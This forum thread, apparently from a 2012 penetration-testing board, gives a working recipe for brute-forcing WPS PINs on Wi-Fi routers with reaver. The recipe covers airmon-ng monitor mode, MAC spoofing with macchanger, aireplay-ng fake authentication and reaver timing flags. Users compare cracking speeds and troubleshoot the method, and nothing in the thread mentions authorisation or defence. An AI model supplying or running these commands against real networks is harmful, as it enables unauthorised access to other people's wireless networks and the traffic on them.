Hi Eatme! Thans for the info!
I was wondering if you could post your conkyrc file as I like your config a lot?![]()
*This worked for me
:~# airmon-ng stop wlan0/mon0
ifconfig wlan0 down
macchanger -a wlan0 > copy mac
airmon-ng start wlan0 11 < AP channel
ifconfig mon0 down
macchanger -m "paste same mac" mon0
ifconfig wlan0 up
ifconfig mon0 up
open new > TAB/Window/Terminal
aireplay-ng mon0 -1 120 -a BSSID -e ESSID > let it run
:~# reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600
-d 1 can be -d 0 (0 might be too fast, in case it is add -l 60 or 120)
-play around with -x 30 as well, i manage to get 5-20+ keys /seconds without any errors
*This worked for me
![]()
Last edited by Eatme; 05-23-2012 at 07:26 AM.
Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
AWUSO36H_500mW_5dBi Antenna
Hi Eatme! Thans for the info!
I was wondering if you could post your conkyrc file as I like your config a lot?![]()
Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
AWUSO36H_500mW_5dBi Antenna
im guessing the lower the (xx seconds/pin) are the faster its cracking or is it the higher they are..
I'm trying to test out some diff commands to make it crack the fastest without errors.. or trying the same pin
The highest I have it at is (10-20 seconds/pin)
Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
AWUSO36H_500mW_5dBi Antenna
i am using this method its take time between 2 or 10 hour depend on the PIN correct me if i am wrong....![]()
Last edited by longjidin; 05-30-2012 at 12:27 AM. Reason: change icon
macchanger -a wlan0 > copy mac
what is meant by copy mac, is it mac wireless card or mac app
Apologies for quoting this old comment.
What is the reason for running
simultaneously with reaver in another terminal please.Code:aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID
I have been able to crack many WPS enabled APs just with this command:
Question1: What is the need to for the aireplay-ng command in another terminal?Code:reaver -i mon0 -b BSSID -c 7 -x 60 -a -f -vv
Question2: Can you run reaver 1.4 and reaver 1.3 in the same BT installation please?
Kind regards always![]()
1) The reason for me running the aireplay command was due to reaver not functioning as it should
on the installation I had at that time. Not sure what the error was that necessitated that, but it
was a work around that worked at the time.
With a later install on the later released BT5R2 it was no longer required for me.
It was a fix that was required only when reaver was not correctly associating on my setup, if it works
'out of the box' for you then no need to even consider it.
2) Actually, I dont think you can with the normal install procedures as one will overwrite the other..